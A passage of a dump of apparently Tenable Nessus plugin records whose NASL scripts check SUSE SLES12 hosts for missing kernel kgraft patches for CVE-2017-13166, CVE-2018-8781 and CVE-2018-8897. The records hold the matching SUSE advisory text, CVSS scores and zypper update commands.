script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1540-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_86 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181540-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88a6ec93\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1042=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_86-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_86-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_86-default-9-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_86-xen-9-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:28:36", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.74-60_64_60 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer", "modified": "2019-12-02T00:00:00", "id": "SUSE_SU-2018-1546-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110377", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1546-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1546-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110377);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1546-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_60 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181546-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a690614c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1052=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1052=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_60-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_60-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_60-default-8-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_60-xen-8-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:28:35", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.61-52_119 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer", "modified": "2019-12-02T00:00:00", "id": "SUSE_SU-2018-1543-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110375", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1543-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1543-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110375);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1543-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_119 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181543-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3894ee85\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1035=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_119-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_119-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_119-default-5-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_119-xen-5-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:28:22", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.74-60_64_63 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer", "modified": "2019-12-02T00:00:00", "id": "SUSE_SU-2018-1519-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110353", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1519-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1519-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110353);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1519-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_63 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181519-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?994588fa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1051=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1051=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n 